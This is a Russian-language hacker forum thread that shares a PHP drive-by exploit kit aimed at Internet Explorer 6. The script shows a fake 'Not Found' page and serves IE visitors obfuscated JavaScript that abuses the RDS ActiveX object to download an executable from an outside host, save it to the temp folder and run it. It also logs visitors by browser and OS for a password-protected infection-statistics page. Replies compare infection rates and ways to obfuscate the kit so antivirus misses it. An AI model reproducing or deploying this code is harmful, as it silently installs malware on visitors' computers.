связка

[iron]

Откопал у себя какуюто связку старую хз мож нада каму.
не тестил ее но помоему она под 6 ие.
ели паблик то не ругайтесь.

<?php
//=============================
//  send file, exploit succeed
//=============================
if (!file_exists('1.exe')) {
  echo '<div align="center"><font color="red"><b>FILE 1.exe NOT FOUND!!!</b></font></div>';
  die;
}
if (isset($_GET['a'])) {
  header("Content-Type: application/octet-stream");
  readfile('1.exe');
  //store info about this visitor
  $fp = fopen('mystat_done', 'a');
  flock($fp, 2);
  fputs($fp, "1\n");
  flock($fp, 3);
  fclose($fp);
  die;
}
//=============================
//  show statistic
//=============================
 //some variables for statictic
 $_browsers = array(
   0 => 'Unknown',
   1 => 'MSIE',
   2 => 'Opera',
   3 => 'FireFox'
 );
 $_oses = array(
   0 => 'Unknown',
   1 => 'Windows 95',
   2 => 'Windows NT',
   3 => 'Windows ME',
   4 => 'Windows 98',
   5 => 'Windows 2000',
   6 => 'Windows XP',
   7 => 'Windows 2003',
   8 => 'Mac OS',
   9 => 'PowerPC',
   10 => 'Linux'
 );
if (isset($_GET['password']) && $_GET['password'] == '2114m1991') {
  //read info about visitors
  $uas = $oss = array(); $hits = 0;
  if (file_exists('mystat')) {
    $fp = fopen('mystat', 'r');
    flock($fp, 1);
    while (!feof($fp)) {
      $s = trim(fgets($fp));
      if ($s == '') break;
    ++$hits;
    list($ua, $os) = explode(':', $s);
     //store ua info
    if (isset($uas[$ua])) ++$uas[$ua];
       else $uas[$ua] = 1;
    //store os info
     if (isset($oss[$os])) ++$oss[$os];
        else $oss[$os] = 1;
    }
    flock($fp, 3);
    fclose($fp);
  }
  //read info about done
  $done = 0;
  if (file_exists('mystat_done')) {
    $fp = fopen('mystat_done', 'r');
    flock($fp, 1);
while (!feof($fp)) {
      $s = trim(fgets($fp));
  if ($s == '') break;
  ++$done;
}
    flock($fp, 3);
    fclose($fp);
  }
  echo '<table border="1" width="100%"><tr><td width="50%" valign="top">';
  foreach ($uas as $k=>$v) {
    echo $_browsers[$k].' - '.$v.'
';
  }
  echo '</td><td valign="top">';
  foreach ($oss as $k=>$v) {
    echo $_oses[$k].' - '.$v.'
';
  }
  echo "</td></tr></table>Total hits: $hits
Total succeeded: $done
Percent: ".round($done/$hits,2)*100;
  echo '%';
  die;
}

 $unique_names = array();
 if ( isset($_COOKIE['visited']) && $_COOKIE['visited'] == 1 ) {
   echo '<body>';
 } else {
   setcookie('visited', '1', time()+3600*12, '/'); //block this user for 12 hours
   show_spl();
 }



?>
<HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
<?php


function random_str($length) {
  global $unique_names;
  $res = '';
  for ($i=0; $i<$length; ++$i)
    $res .= chr(rand(97, 122));
  if (in_array($res, $unique_names)) $res = random_str($length);
  $unique_names[] = $res;
  return $res;
}

function show_spl() {

$scr = '
 <script Language="JavaScript">
  function var16v() {
    document.forms["var17v"].elements["var18v"].value = "1";
    var19v();
  }
</script>
<body onload="var16v();">
<form name="var17v"><input name="var18v" type="hidden" value="0"></form>
 <script Language="JavaScript">
function var19v() {
  var20v = "Microsoft";
  var21v = "Internet";
  var22v = "Explorer";

  if (navigator.appName!=var20v+" "+var21v+" "+var22v) {
    return;
  }
  if (document.forms["var17v"].elements["var18v"].value != "0") {
  var var1v = document.createElement("object");
  var1v.setAttribute("id","var1v");
  [gen_clsid]
  var1v.setAttribute("classid",[echo_clsid]);
  try {
  var var8v = "ad"; var var9v = "odb";
  var var10v = "str"; var var11v = "eam";
  var var4v = var1v.CreateObject(var8v+var9v+"."+var10v+var11v,"");
  var var6v = "m"+"sxm"+"l2";
  var var7v = "X"+"MLH"+"TTP";
  var var11v = "Sh"; var var12v = "ell";
  var var13v = "Ap"; var var14v = "plicati"; var var15v = "on";
  var var3v = var1v.CreateObject(var11v+var12v+"."+var13v+var14v+var15v,"");
  var var2v = var1v.CreateObject(var6v+"."+var7v,"");
  var2v.open("GET","http://www.sgscontrols.com/counter.php?a=var15v",false);
  var2v.send();
  var4v.type = 1;
  var4v.open();
  var4v.Write(var2v.responseBody);
  var14v = "var8v"+".exe";
  var var23v = var1v.CreateObject("Scripting.FileSystemObject","")
  var14v = var23v.BuildPath(var23v.GetSpecialFolder(2),var14v);
  var4v.SaveToFile(var14v,2);
  var3v.ShellExecute(var14v);
  }
  catch(e){}
  }
}
</Script>';
  $var_to_replace = 22;
  $search = array();
  for ($i=1; $i<=$var_to_replace; ++$i)
    $search[] = '/var'.$i.'v/';
  $search = array_merge($search, array('/\[gen_clsid\]/', '/\[echo_clsid\]/'));
  //creating replacements for variable names
  for ($i=0; $i<$var_to_replace; ++$i)
    $replace[] = random_str(7);
  //creating replacement for generating cls_id
  $s = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
  $mys = '';
  $clsid = array();
  $var_count = rand(5,8);
  $max = 11; $mmax = strlen($s);
  for ($i=0; $i<$var_count; ++$i) {
    $clsid[$i]['name'] = random_str(4);
    if ($max > $mmax) $max = $mmax;
    $n = rand(3,$max);
    if ($i == $var_count-1) $n = $mmax;
    $clsid[$i]['len'] = $n;
    $mmax -= $n;
  }
  $start = 0;
  for ($i=0; $i<$var_count; ++$i) {
    $clsid[$i]['value'] = substr($s, $start, $clsid[$i]['len']);
    $start += $clsid[$i]['len'];
  }
  for ($i=0; $i<$var_count; ++$i) {
    $name = $clsid[$i]['name'];
    $value = $clsid[$i]['value'];
    $mys .= "var $name = '$value';\n";
  }
  $replace[] = $mys;
  //creating replacement for echo cls_id
  $mys = $clsid[0]['name'];
  for ($i=1; $i<$var_count; ++$i) {
    $name = $clsid[$i]['name'];
    $mys .= "+$name";
  }
  $replace[] = $mys;

  //replacing
  $scr = preg_replace($search, $replace, $scr);

  //get info about this visitor
  $UserOS = 0;
  $UserBrowser = 0;
  $ua = $_SERVER['HTTP_USER_AGENT'];

  //getting browser info
  if (preg_match('/Opera/', $ua))
    $UserBrowser = 2;
  elseif (preg_match('/Firefox/', $ua))
    $UserBrowser = 3;
  elseif (preg_match('/MSIE/', $ua))
    $UserBrowser = 1;

  if ($UserBrowser == 1) echo $scr; //let's show it only to IE

  //getting OS info
  if (preg_match('/Windows/', $ua)) {
    if (preg_match('/Windows 95/', $ua))
      $UserOS = 1;
    elseif (preg_match('/Windows NT 4/', $ua))
      $UserOS = 2;
    elseif (preg_match('/Win 9x 4\.9/', $ua))
      $UserOS = 3;
    elseif (preg_match('/Windows 98/', $ua))
      $UserOS = 4;
    elseif (preg_match('/Windows NT 5\.0/', $ua))
      $UserOS = 5;
    elseif (preg_match('/Windows NT 5\.1/', $ua))
      $UserOS = 6;
    elseif (preg_match('/Windows NT 5\.2/', $ua))
      $UserOS = 7;
  }
  elseif (preg_match('/Mac OS/', $ua))
    $UserOS = 8;
  elseif (preg_match('/PowerPC/', $ua))
    $UserOS = 9;
  elseif (preg_match('/Linux/', $ua))
    $UserOS = 10;

  //store info about this visitor
  $fp = fopen('mystat', 'a');
  flock($fp, 2);
  fputs($fp, "$UserBrowser:$UserOS\n");
  flock($fp, 3);
  fclose($fp);


}
?>
The requested URL was not found on this server.


<HR noshade="noshade">
Apache/1.3.31 Server at Port 80
</BODY>
</HTML>

 

[kip]

Полубаблик...
Пробив есть но палиться! Закриптовать не получиться!

 

[iron]

и какой пробив? ты тестил?

 

[Fallen]

чета не понял,как стата работает?

 

[iron]

она в файл скидывает стату
версию винды и браузер

 

[kip]

Пробив на стате 25-30
Реальный = 5-7
С даунлоадером = 15 (только мозх надо)

 

[AHTOLLlKA]

ога сплоитег RDS
сделать норманую стату и усе будет красиво =/
Добавлено в [time]1165752908[/time]

Закриптовать не получиться!

чё за бред, криптануть в легкую можно =)
у меня не палица не чем ))

 

[iron]

AHTOLLlKA
а поподробней как криптовал
как стату переделывал ...выкладывай все че знаеш о связке

 

[AHTOLLlKA]

а стату посмотреть можно так:
http://www.site.ru/sploit.php?password=2114m1991
2114m1991 - пароль по умолчанию
Добавлено в [time]1165753587[/time]

как стату переделывал ...выкладывай все че знаеш о связке

дакакая тут связка то =)
тут просто RDS сплоит + стата легкая =)))
и все))

криптовать то тут че )) простой EVAL() прячет дахера всего